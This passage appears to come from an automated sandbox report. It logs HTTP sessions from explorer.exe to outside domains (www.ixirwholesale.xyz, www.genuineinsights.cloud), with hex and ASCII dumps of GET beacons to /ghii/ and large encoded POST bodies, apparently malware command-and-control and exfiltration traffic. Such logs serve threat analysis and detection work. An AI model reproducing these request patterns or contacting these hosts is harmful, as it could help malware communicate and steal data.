35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                                            Feb 18, 2023 13:06:49.600687981 CET139INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                                            Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                                            Feb 18, 2023 13:06:49.600708961 CET140INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                                            Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                                            Feb 18, 2023 13:06:49.600728989 CET141INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                                            Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                                            Feb 18, 2023 13:06:49.600758076 CET142INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                                            Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            30192.168.2.34973085.159.66.9380C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:32.248002052 CET335OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:32.525103092 CET335OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:32.837626934 CET335OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:33.447046995 CET335OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:34.650283098 CET336OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:35.853471041 CET336OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:37.056720018 CET336OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:39.463313103 CET336OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:44.276216984 CET337OUTGET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            4192.168.2.34970466.96.162.14980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:06:54.836949110 CET143OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.genuineinsights.cloud
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.genuineinsights.cloud
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.genuineinsights.cloud/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 53 33 45 67 28 4a 6d 4c 65 44 48 4e 66 51 53 58 37 51 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8AkS3Eg(JmLeDHNfQSX7Q).
                                                                                            Feb 18, 2023 13:06:54.950476885 CET144INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:06:54 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 867
                                                                                            Connection: close
                                                                                            Server: Apache/2
                                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Age: 0
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            5192.168.2.34970566.96.162.14980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:06:57.475841999 CET150OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.genuineinsights.cloud
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.genuineinsights.cloud
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.genuineinsights.cloud/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 58 74 48 64 71 45 2d 33 48 77 4f 58 4f 4d 36 74 4e 6f 4e 76 7a 59 4b 48 71 6b 42 61 67 36 72 50 35 55 66 64 63 66 6d 75 6a 4b 58 70 75 4d 49 67 42 33 6b 48 62 47 54 65 6d 70 48 67 51 67 31 41 49 4a 5a 77 46 73 4c 7e 6c 37 73 47 33 57 4c 48 67 32 32 6d 2d 77 66 6b 5a 4d 41 64 55 6f 69 5a 4f 28 6e 74 33 7e 71 4a 37 57 2d 64 5a 6f 58 66 48 58 62 64 70 31 73 74 41 57 30 30 4c 66 6a 58 70 39 34 56 4f 4d 6c 6c 6d 72 68 52 75 4c 6e 6e 39 68 67 59 6b 41 69 7a 34 6a 36 54 6b 4f 6e 4c 54 6d 61 73 50 55 55 4a 6b 53 68 71 71 51 57 58 58 59 68 66 70 4a 71 55 57 72 37 64 5a 33 46 75 43 34 69 32 45 42 51 51 4e 6f 50 46 71 7e 79 44 46 6f 6e 73 63 73 55 66 32 54 51 56 54 4c 46 53 59 35 51 53 38 48 39 75 74 74 66 53 76 30 35 6c 32 64 49 64 77 57 78 7a 49 49 6a 6d 53 51 33 6b 36 49 49 41 38 65 4a 53 32 65 69 4b 57 36 31 77 33 73 38 44 4a 64 78 76 30 46 37 4b 36 7e 38 4c 65 67 68 4f 54 34 56 47 66 6c 41 4b 4c 4a 75 31 6d 79 37 64 52 58 65 67 74 67 6b 4f 50 72 44 6b 32 6d 66 28 59 31 71 62 45 54 31 37 2d 76 4b 68 44 51 69 51 64 53 53 6e 67 4d 44 4a 56 57 6d 6f 39 6b 6f 4e 30 75 44 67 70 31 59 28 6a 32 43 71 69 7e 4d 54 44 33 6e 7a 6c 64 58 4d 78 53 77 54 68 66 79 58 36 41 37 30 72 4b 73 36 59 62 66 44 32 6a 48 33 42 6b 71 75 55 55 56 4f 78 66 77 33 43 69 54 70 53 77 50 63 77 68 30 49 4c 7e 71 35 66 73 34 42 55 67 43 4d 61 68 59 74 6e 38 44 59 59 74 67 6d 65 31 42 68 42 47 4b 55 64 48 65 7e 52 35 62 51 73 57 65 43 74 37 72 6f 50 37 65 48 6a 63 61 32 36 34 45 33 54 46 5f 63 37 63 39 4b 31 69 72 4d 6e 74 6b 62 35 30 68 77 69 47 69 73 39 68 53 33 49 32 54 35 5f 72 5f 59 4f 4f 70 51 64 53 6c 64 33 78 53 58 42 41 57 61 39 64 4d 35 4f 39 45 49 57 61 46 4e 31 66 75 65 49 73 63 39 4d 74 52 46 71 33 57 66 57 4c 39 5a 43 54 76 4e 4a 50 4d 79 61 77 53 6c 6b 6c 42 46 31 30 75 48 43 43 47 69 50 46 52 78 44 68 6f 65 49 55 54 79 4a 62 61 71 46 65 32 4d 37 74 72 57 35 71 50 59 64 57 66 33 4b 4e 6d 56 46 34 38 66 34 6c 64 32 34 53 47 4b 75 63 71 4e 30 57 72 51 6d 7a 78 68 77 51 5f 30 39 70 77 39 35 63 78 59 4a 46 69 76 65 6f 52 33 72 74 50 74 43 69 2d 33 65 41 71 54 73 50 48 34 45 4b 6d 78 64 63 66 68 4a 39 68 63 45 42 6e 43 76 59 49 61 64 6a 64 36 6b 63 79 30 4b 75 63 71 62 4a 4d 72 49 4c 64 33 34 78 2d 33 61 35 61 57 41 46 72 31 68 39 4a 79 61 7a 6f 31 46 64 51 6c 51 7e 34 57 53 42 44 5a 4d 73 5f 49 74 55 53 52 52 7e 76 6f 71 31 74 53 79 75 56 6c 4f 56 30 79 32 74 59 64 75 43 2d 37 6c 56 36 33 62 7e 37 71 7a 33 42 43 72 6e 45 36 78 38 61 51 54 46 50 4f 56 44 64 76 4e 35 47 30 68 32 70 37 4b 66 35 47 44 4d 6a 48 66 65 79 69 39 56 72 47 75 56 66 5a 57 71 64 6b 44 77 41 4b 53 43 6e 6c 50 79 53 51 79 63 41 39 78 62 44 7a 59 48 64 42 73 52 33 44 33 41 36 74 62 30 39 67 52 4c 42 73 7a 70 2d 73 2d 48 6c 47 4f 76 77 59 44 76 6c 77 63 6d 7a 32 66 77 53 6e 73 4a 31 73 58 44 7a 73 6c 4a 6e 52 31 4c 74 6f 4c 6d 72 66 4d 51 4e 79 7a 6c 57 53 49 36 70 71 70 59 78 44 51 4e 50 39 33 30 5f 57 6b 6c 4e 4e 4d 49 30 5a 48 49 4d 66 59 70 42 50 49 33 39 77 71 30 4d 50 56 72 73 5a 44 30 6f 42 30 72 32 47 65 70 32 28 68 76 74 36 6d 7a 4b 48 6f 52 33 48 4e 67 72 76 47 4b 33 42 30 5a 6a 33 57 72 53 35 43 54 46 4b 53 48 51 36 79 67 52 4b 76 34 52 34 48 48 62 28 50 47 62 38 50 45 41 47 76 33 5f 7a 7a 7e 47 41 50 6f 34 73 77 4f 79 43 51 6e 6f 42 6d 61 4b 49 45 5a 61 71 46 51 6c 4a 6d 63 51 6d 6e 46 37 50 4e 55 35 54 67 59 62 38 75 54 47 75 54 6c 6c 54 41 53 48 71 5f 7a 34 4c 39 71 33 54 54 78 54 41 65 51 58 6d 71 63 70 76 43 46 44 74 35 6e 67 77 66 6a 57 49 78 78 39 6f 38 62 7a 51 72 69 7a 33 4e 73 58 75 72 36 52 77 46 6e 35 79 68 51 59 30 5f 7a 47 78 5f 66 6f 70 52 35 67 62 76 6d 71 57 72 4a 4f 37 36 6b 59 4d 41 6e 68 6b 5a 46 52 31 75 51 66 67 52 32 61 72 33 56 49 5a 4b 36 35 68 6c 32 59 70 78 59 6c 70 62 71 6e 75 74 76 53 65 39 47 71 7e 48 6d 35 43 35 65 34 67 34 61 2d 75 71 71 73 35 66 4e 6c 35 74 44 62 46 79 74 62 50 6e 62 4b 6f 5a 31 67 69 4b 66 75 77 74 28 47 71 42 61 38 6f 70 47 4d 62 76 30 6d 37 59 5a 77 50 34 63 31 44 34 56 53 70 2d 5a 35 32 49 30 42 49 64 34 42 55 37 4a 56 69 55 41 2d 76 35 64 47 7a 35 42 4e 4a 70 58 61
                                                                                            Data Ascii: Y5=W_BGHVKy9BRsAXtHdqE-3HwOXOM6tNoNvzYKHqkBag6rP5UfdcfmujKXpuMIgB3kHbGTempHgQg1AIJZwFsL~l7sG3WLHg22m-wfkZMAdUoiZO(nt3~qJ7W-dZoXfHXbdp1stAW00LfjXp94VOMllmrhRuLnn9hgYkAiz4j6TkOnLTmasPUUJkShqqQWXXYhfpJqUWr7dZ3FuC4i2EBQQNoPFq~yDFonscsUf2TQVTLFSY5QS8H9uttfSv05l2dIdwWxzIIjmSQ3k6IIA8eJS2eiKW61w3s8DJdxv0F7K6~8LeghOT4VGflAKLJu1my7dRXegtgkOPrDk2mf(Y1qbET17-vKhDQiQdSSngMDJVWmo9koN0uDgp1Y(j2Cqi~MTD3nzldXMxSwThfyX6A70rKs6YbfD2jH3BkquUUVOxfw3CiTpSwPcwh0IL~q5fs4BUgCMahYtn8DYYtgme1BhBGKUdHe~R5bQsWeCt7roP7eHjca264E3TF_c7c9K1irMntkb50hwiGis9hS3I2T5_r_YOOpQdSld3xSXBAWa9dM5O9EIWaFN1fueIsc9MtRFq3WfWL9ZCTvNJPMyawSlklBF10uHCCGiPFRxDhoeIUTyJbaqFe2M7trW5qPYdWf3KNmVF48f4ld24SGKucqN0WrQmzxhwQ_09pw95cxYJFiveoR3rtPtCi-3eAqTsPH4EKmxdcfhJ9hcEBnCvYIadjd6kcy0KucqbJMrILd34x-3a5aWAFr1h9Jyazo1FdQlQ~4WSBDZMs_ItUSRR~voq1tSyuVlOV0y2tYduC-7lV63b~7qz3BCrnE6x8aQTFPOVDdvN5G0h2p7Kf5GDMjHfeyi9VrGuVfZWqdkDwAKSCnlPySQycA9xbDzYHdBsR3D3A6tb09gRLBszp-s-HlGOvwYDvlwcmz2fwSnsJ1sXDzslJnR1LtoLmrfMQNyzlWSI6pqpYxDQNP930_WklNNMI0ZHIMfYpBPI39wq0MPVrsZD0oB0r2Gep2(hvt6mzKHoR3HNgrvGK3B0Zj3WrS5CTFKSHQ6ygRKv4R4HHb(PGb8PEAGv3_zz~GAPo4swOyCQnoBmaKIEZaqFQlJmcQmnF7PNU5TgYb8uTGuTllTASHq_z4L9q3TTxTAeQXmqcpvCFDt5ngwfjWIxx9o8bzQriz3NsXur6RwFn5yhQY0_zGx_fopR5gbvmqWrJO76kYMAnhkZFR1uQfgR2ar3VIZK65hl2YpxYlpbqnutvSe9Gq~Hm5C5e4g4a-uqqs5fNl5tDbFytbPnbKoZ1giKfuwt(GqBa8opGMbv0m7YZwP4c1D4VSp-Z52I0BId4BU7JViUA-v5dGz5BNJpXajH5nFvXZMoRx9crEqyrvCw7UnvDJXqK-EY7VjKywegfTiRtkuLxVuuK78Me9JX1eKi73RscUmJLwN8oGOcAU7531CmCtlx2L46INYq9a9qMitNvbWjZGXsIPHmpLJWEDJVfm(QRHaNHBpvJe4Oke~62RoyHUOlWiNYDEbEPPI47BOqpBR7R2JvTkRYtWu1HSjkLe42O60745IZQuZLotyxdrbK~jwFcSukqvbBo3DMiXPYfxq7iNr2Nhh8mWz9DZDMq9Otsw7fHvHyFCXCKqAERQH0KIdSNHP0vW3vkl9wC0kp2uD_1WwLqgigUurSHDU9z_i1pGS-aEJROgJk5BB1m_DtAcQ5VuKWpknkzAT4RvoY0PiGnMyz26yhQfLLBMDEAplDHdSG2Zb5K7gAHIySNNY1BpJc8vTpVJojQIba~2oC9WVwDBBIWdkNqd1F4CMC5piRvTbpCp6B8vKsI9a5SLyiinSMWvJXOOW6gkyJsUtGa7Jx5UYaOS3b24xAoDVkAYsVlXPh1i8CK9HBKct1KMnLjox82iOUgl09E_8iVTUAPo8FJbO0M1Fq9JhEo4D5jUqvLRTnOfVLKc7M66wd3npF9KsSaxqqH6rIQWKZ5NVi6OtEXDmtRofqK5hDMAOMhR5r71BTdbzbpnH-pVSJ3hGdB3khpBZAXCx1JQModB8egxqTW442AIkbVDv8f00OtKHhOy4TBGzUjZGFh9FGdoeCtoO6kiB_h6Z-6SBKBa7Pq2UNvxRsjxPGFd6IUi4iaoJpI84l0Ok28p9QQeh9lcd28rnjuxdgzIo57NXkYvWKr-TxhY2lrG9Vp3MK28DrlDMNDrmZdlhl0WZNjZsUtrQ5fpcY0B6lj-2VjrDiOmXmuVrGYdZsn6huj1o8~1JWKUQlYMjv2-QrPSXW8FB-jifUxg6GntixBAuiPqLhYdOXoyyExoRbt5tAPCzrySMl0EHKmLWXulw7TNPaSBFqtByau2SbJbw69qeMPxDXjxxPe8tLwF0fAI(PKN0nRXbKix2UJMpXpHKp0CRiiMyoTwOfL88DtzTJxmP1w_Kxv-IutvSaI4GBqnRAfOUmx8TFHQYvhROpmAW8sH(MBO7NmvrFm-2vgQrdmxezbpaOu-JKk6nIcGkkvX8hUuAHQ6P9kosYadKnOiS19yefvmuymfx_qwhcNJv4XYp9EvgEXmE3cO6yLkmRFpE0NIUOz6IMZ0~eo0YfEXeOBauS4sHMRaPt7Lm3aOOr1n2KtxJccvIPTmZAN3ABKj8Tt6yeDUsTzy4HkRws7NubA9pe3j~t8NeKUlA7ynK7~78rWFb_uDndwH9IFYUADkfqRunEo-M80DaODSIlIaI4V3V2dN1yPoCYrVZz5uR_yNG4HArp~HaEgvh1iYrPc8c2YmPXu_qx4EWWCNlB5xE1H0xx5CyLlpgvT4DivevMiu98faW02sK2IhMJKUSLUPwPQoLbgIexGEJ1nAutp_x9pWzAHIEM70dvgdv2pM98YJbodXAEviCj4NmV5QL3T-Glah6xYSkCus(gWMi3fDcxUFE8bLoGUSVwxgTkc4ZHUY1DcbIcJNUgyPTXC7P9(n82HIeUslf_Or74(o~-sELfHL8iOaj3tUDYRFRvhY~0HXOYHf2YUso2YoSP6Od8ULd1rd9NYtUExUPyIwb6TGWTkGXlCJFc2V(IbsQPsQzNl9v0uWlzpMHtBcdOJMe_PS0T1Ff_u0q2HyPMVOXDm7mDIpVoLhaLR97SpnzOozi68sd9~DWDpdkMV6PpqJGSpb2auS9KZ5gNH-yIyDKhMLDkvPp4L9akkJs6HQn7~zUsbKNgZ2Q6eRXNog07MOBSG-NpV8FcpKrkfkLpr_1KywFcZoELAHb-Y1JmRitmgtVxH2kvqGofy8geE0BQbrhPI4S3IVBWA8rBJjiFy9pXvfwbcGk_6RrnJ_aHHQFr74h4WcefCrGien9rF212rzxGdt74WSOOLkX2jS5JrVcLqOPWG2c65M2-(VR8w4oVge0lPMuLva(9zY(Bf47zoFPw1fHU6U5y6Tow067KbTMnxE4VvPZUHwGaHZM9a0n5gyoNYdF8eRGT0hhNUxs5mG